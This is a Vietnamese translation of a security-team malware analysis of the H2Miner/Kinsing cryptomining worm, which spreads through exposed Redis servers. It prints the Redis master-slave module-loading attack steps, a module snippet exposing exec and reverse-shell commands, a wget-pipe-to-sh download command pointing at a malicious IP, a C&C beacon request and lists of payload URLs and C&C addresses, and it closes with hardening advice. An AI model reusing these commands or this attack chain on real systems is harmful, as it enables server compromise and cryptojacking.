Một ngày trước, một trong những máy chủ dự án của tôi đã bị tấn công bởi một loại sâu tương tự. Để tìm câu trả lời cho câu hỏi “đó là gì?” Tôi tìm thấy một bài viết hay của nhóm Alibaba Cloud Security. Vì không tìm thấy bài viết này trên Habré nên tôi quyết định dịch riêng cho bạn <3
Nhập
Mới đây, đội ngũ bảo mật của Alibaba Cloud đã phát hiện ra sự bùng phát bất ngờ của H2Miner. Loại sâu độc hại này sử dụng sự thiếu ủy quyền hoặc mật khẩu yếu của Redis làm cổng vào hệ thống của bạn, sau đó nó đồng bộ hóa mô-đun độc hại của chính nó với nô lệ thông qua đồng bộ hóa chủ-nô lệ và cuối cùng tải mô-đun độc hại này xuống máy bị tấn công và thực thi độc hại. hướng dẫn.
Trước đây, các cuộc tấn công vào hệ thống của bạn chủ yếu được thực hiện bằng phương pháp liên quan đến các tác vụ được lên lịch hoặc khóa SSH được ghi vào máy của bạn sau khi kẻ tấn công đăng nhập vào Redis. May mắn thay, phương pháp này không thể được sử dụng thường xuyên do vấn đề kiểm soát quyền hoặc do các phiên bản hệ thống khác nhau. Tuy nhiên, phương pháp tải mô-đun độc hại này có thể thực thi trực tiếp các lệnh của kẻ tấn công hoặc giành quyền truy cập vào shell, điều này gây nguy hiểm cho hệ thống của bạn.
Do số lượng lớn máy chủ Redis được lưu trữ trên Internet (gần 1 triệu), nhóm bảo mật của Alibaba Cloud, như một lời nhắc nhở thân thiện, khuyến nghị người dùng không chia sẻ Redis trực tuyến và thường xuyên kiểm tra độ mạnh mật khẩu của họ cũng như liệu chúng có bị xâm phạm hay không. sự lựa chọnnhanh.
Công cụ khai thác H2
H2Miner là một botnet khai thác dành cho các hệ thống dựa trên Linux. Nó có thể xâm chiếm hệ thống của bạn theo nhiều cách khác nhau, bao gồm cả việc thiếu ủy quyền trong các lỗ hổng thực thi lệnh từ xa (RCE) của Hadoop, Docker và Redis. Botnet hoạt động bằng cách tải xuống các tập lệnh độc hại và phần mềm độc hại để khai thác dữ liệu của bạn, mở rộng cuộc tấn công theo chiều ngang và duy trì liên lạc lệnh và kiểm soát (C&C).
Redis RCE
Kiến thức về chủ đề này đã được Pavel Toporkov chia sẻ tại ZeroNights 2018. Sau phiên bản 4.0, Redis hỗ trợ tính năng tải plug-in cung cấp cho người dùng khả năng tải các tệp được biên dịch bằng C vào Redis để thực thi các lệnh Redis cụ thể. Chức năng này, mặc dù hữu ích, nhưng lại chứa một lỗ hổng trong đó, ở chế độ chủ-nô lệ, các tệp có thể được đồng bộ hóa với nô lệ thông qua chế độ đồng bộ hóa hoàn toàn. Điều này có thể được kẻ tấn công sử dụng để chuyển các tập tin độc hại. Sau khi quá trình truyền hoàn tất, kẻ tấn công tải mô-đun vào phiên bản Redis bị tấn công và thực hiện bất kỳ lệnh nào.
Phân tích sâu phần mềm độc hại
Mới đây, đội ngũ bảo mật của Alibaba Cloud phát hiện quy mô của nhóm khai thác độc hại H2Miner đột ngột tăng lên đáng kể. Theo phân tích, quá trình xảy ra cuộc tấn công chung như sau:
H2Miner sử dụng RCE Redis cho một cuộc tấn công toàn diện. Những kẻ tấn công trước tiên tấn công máy chủ Redis không được bảo vệ hoặc máy chủ có mật khẩu yếu.
Sau đó họ dùng lệnh config set dbfilename red2.so để thay đổi tên tập tin. Sau đó, kẻ tấn công thực hiện lệnh slaveof để đặt địa chỉ máy chủ sao chép chủ-nô lệ.
Khi phiên bản Redis bị tấn công thiết lập kết nối chính-phụ với Redis độc hại thuộc sở hữu của kẻ tấn công, kẻ tấn công sẽ gửi mô-đun bị nhiễm bằng lệnh fullresync để đồng bộ hóa các tệp. Sau đó, tệp red2.so sẽ được tải xuống máy bị tấn công. Sau đó, những kẻ tấn công sử dụng mô-đun tải ./red2.so để tải tệp này. Mô-đun này có thể thực thi các lệnh từ kẻ tấn công hoặc khởi tạo kết nối ngược (cửa sau) để có quyền truy cập vào máy bị tấn công.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Sau khi thực hiện một lệnh độc hại như / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, kẻ tấn công sẽ đặt lại tên tệp sao lưu và dỡ mô-đun hệ thống để xóa dấu vết. Tuy nhiên, tệp red2.so vẫn còn trên máy bị tấn công. Người dùng nên chú ý đến sự hiện diện của tệp đáng ngờ như vậy trong thư mục phiên bản Redis của họ.
Ngoài việc tiêu diệt một số quy trình độc hại để đánh cắp tài nguyên, kẻ tấn công còn tuân theo một tập lệnh độc hại bằng cách tải xuống và thực thi các tệp nhị phân độc hại để . Điều này có nghĩa là tên tiến trình hoặc tên thư mục chứa kinsing trên máy chủ có thể cho biết máy đó đã bị nhiễm vi-rút này.
Theo kết quả kỹ thuật đảo ngược, phần mềm độc hại chủ yếu thực hiện các chức năng sau:
- Tải tập tin lên và thực thi chúng
- khai thác mỏ
- Duy trì liên lạc C&C và thực thi các lệnh của kẻ tấn công
Sử dụng masscan để quét bên ngoài để mở rộng tầm ảnh hưởng của bạn. Ngoài ra, địa chỉ IP của máy chủ C&C được mã hóa cứng trong chương trình và máy chủ bị tấn công sẽ liên lạc với máy chủ liên lạc C&C bằng cách sử dụng các yêu cầu HTTP, trong đó thông tin zombie (máy chủ bị xâm nhập) được xác định trong tiêu đề HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Các phương thức tấn công khác
Địa chỉ và liên kết được sử dụng bởi sâu
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tư vấn
Đầu tiên, Redis không thể truy cập được từ Internet và phải được bảo vệ bằng mật khẩu mạnh. Điều quan trọng nữa là khách hàng phải kiểm tra xem không có tệp red2.so nào trong thư mục Redis và không có “kinsing” trong tên tệp/tiến trình trên máy chủ.
Nguồn: www.habr.com